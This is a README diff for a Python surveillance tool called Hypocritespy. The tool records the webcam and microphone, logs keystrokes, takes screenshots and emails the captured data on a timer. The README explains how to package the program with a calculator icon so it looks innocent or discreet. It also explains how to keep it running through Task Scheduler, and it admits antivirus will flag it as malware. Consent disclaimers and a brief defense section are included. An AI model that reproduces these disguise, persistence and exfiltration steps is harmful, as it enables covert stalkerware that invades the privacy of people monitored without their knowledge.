Ronny12345-art/Hypocritespy/README.md

-🔴  Hypocritespy
+Hypocritespy

-A Python-based surveillance utility Built with ❤️, ☕, and controlled chaos by Ronny Rogers (Mugabo Rongin)
+A Python-based surveillance utility
+Built with passion, coffee, and controlled chaos by Ronny Rogers (Mugabo Rongin)

+⚠️ Important Notice

-⚠️ WARNING: This tool is for LEGITIMATE SECURITY TESTING ONLY on devices you own or have explicit permission to monitor.
-Unauthorized use violates privacy laws globally.
+This tool is intended strictly for LEGITIMATE SECURITY TESTING on devices you own or have explicit authorization to monitor.

-🎯 What Does It Do?
+Unauthorized use is illegal and violates privacy laws worldwide.

+🎯 Overview

-This toolkit captures system activity through multiple vectors:
+Hypocritespy captures system activity through multiple monitoring vectors:

-🎥 Webcam Recording – Captures video from default camera
+🎥 Webcam Recording — Captures video from the default camera

-🎤 Microphone Recording – Grabs ambient audio
+🎤 Microphone Recording — Records ambient audio

-⌨️ Keylogging – Tracks all keyboard inputs
+⌨️ Keylogging — Tracks keyboard inputs

-🖼️ Screenshots – Takes periodic screen captures
+🖼️ Screenshots — Takes periodic screenshots

+Default operation:
-Default behavior: Records 10 minutes every 3 hours → emails data → repeats.
+Records 10 minutes every 3 hours, emails captured data, then repeats.

-🛠️ Quick Setup
+🛠️ Quick Setup Guide
-1. 🔧 Edit These 4 Things
+1. Configuration

-Open the code files and replace:
+Open the Python source files and update the following values:

-python
-# Your email (remove the existing one)
-YOUR_EMAIL = "your_email@gmail.com"
+YOUR_EMAIL = "your_email@gmail.com"           # Your sending email address

-# Your app password (not regular password!)
-APP_PASSWORD = "your_app_specific_password"
+APP_PASSWORD = "your_app_specific_password"   # Use an app password, NOT your regular email password

-# Recipient email
-RECIPIENT = "receiver@gmail.com"
+RECIPIENT = "receiver@gmail.com"               # Destination email for captured data

-# Timing settings (adjust as needed)
+# Timing settings (customize as needed)
-RECORD_DURATION = 600    # Seconds (10 minutes default)
+RECORD_DURATION = 600     # Duration in seconds (default: 10 minutes)
-INTERVAL = 10800         # Seconds between sessions (3 hours default)
+INTERVAL = 10800          # Interval between recording sessions in seconds (default: 3 hours)

-2. 📦 Build the Executable
+2. Build the Executable
-Make it look innocent:

-bash
-# Get a harmless icon (calculator.ico, notepad.ico, etc.)
+To create a discreet executable, use a benign icon (e.g., calculator.ico):

 pyinstaller --onefile --windowed --icon=calculator.ico main.py

-3. ⚡ Ensure Startup Execution
+3. Ensure Startup Execution

-For 100% reliability, use Task Scheduler to trigger on startup/logon.
+For persistent operation, configure Task Scheduler (Windows) or an equivalent method to run the program at startup or user logon.

-🎨 Customization Options
+🎨 Customization

-Timing Presets
+Timing presets:

-python
-# Quick monitoring (1 min every hour)
+# Quick monitoring (1 minute every hour)
 RECORD_DURATION = 60
 INTERVAL = 3600

 # Aggressive monitoring (continuous)
 RECORD_DURATION = 86400  # 24 hours
 INTERVAL = 1             # Immediate repeat

-Feature Toggles
-Enable/disable specific modules in the configuration.
+Feature toggles: Enable or disable modules (webcam, mic, keylogger, screenshots) in the configuration files as needed.

-⚠️ Critical Notes
+⚠️ Critical Warnings

-🚫 Antivirus will flag this as malware (because it is)
+Antivirus software will likely flag this tool as malicious.
+This is expected behavior.

-📧 Use app passwords, not your real email password
+Always use app-specific passwords for email, never your primary account password.

-🔒 Test in isolated VMs only
+Test exclusively in isolated virtual machines or controlled environments.

-⚖️ Check local laws before deployment
+Review and comply with all local laws before use.

-👁️ Always get written consent when monitoring others
+Obtain written consent from all monitored parties.

-🛡️ Defense Against Such Tools
+🛡️ Defense Against Surveillance Tools

-To protect systems from unauthorized surveillance:
+To protect your systems from unauthorized monitoring:

-🛡️ Use reputable antivirus software
+Use reputable antivirus and anti-malware solutions.

-🔍 Monitor startup programs regularly
+Regularly audit startup programs and scheduled tasks.

-🌐 Check outgoing network connections
+Monitor outgoing network connections for suspicious activity.

-📋 Review Task Scheduler entries

-🎯 Use webcam privacy covers
+Employ physical webcam covers when not in use.

 📚 Legitimate Use Cases

-✅ Parental control (with child's knowledge where required)
+Parental control (with required knowledge or consent)

-✅ Employee monitoring (with written consent & legal compliance)
+Employee monitoring (with legal compliance and consent)

-✅ Personal device security research
+Personal device security research

-✅ Authorized penetration testing
+Authorized penetration testing

-✅ Educational cybersecurity studies
+Educational cybersecurity exercises

-🚫 Illegal Uses
+🚫 Prohibited Uses

-❌ Monitoring without consent
+Monitoring without explicit consent

-❌ Spying on partners/friends/family
+Spying on partners, friends, or family

-❌ Corporate espionage
+Corporate espionage

-❌ Any unauthorized surveillance
+Any unauthorized surveillance or privacy invasion

 ⚖️ Legal Disclaimer

 By using this software, you agree that:

-You will only use it legally and ethically
+You will use it only in a legal, ethical manner.

-You accept full responsibility for your actions
+You accept full responsibility for any consequences arising from its use.

-The developer is not liable for misuse
+The developer holds no liability for misuse or illegal activities.

-You understand the potential legal consequences of unauthorized use
+You understand the potential legal ramifications of unauthorized surveillance.

-📞 More info
-[For educational inquiries only](https://ronny12345-art.github.io/ronnyrogers.dev/

 👤 Author

-Ronny Rogers 💻 Developer | 🛡️ Cyber security specialist | ⚡ Pentester)

-Purpose: Learning about surveillance detection

-Goal: Improving defensive security measures

-Ethics: Always prioritize privacy and consent
+Ronny Rogers
+Developer | Cybersecurity Specialist | Penetration Tester More info

+🔐 Final Note

-🔐 Remember: True power in cybersecurity comes from protection, not intrusion.
-Use this knowledge to build better defenses, not to breach them.
+The true power of cybersecurity lies in protection, not intrusion.
+Use this knowledge responsibly to strengthen defenses and respect privacy.

 Version: 1.0 | For Educational Purposes Only | Use Responsibly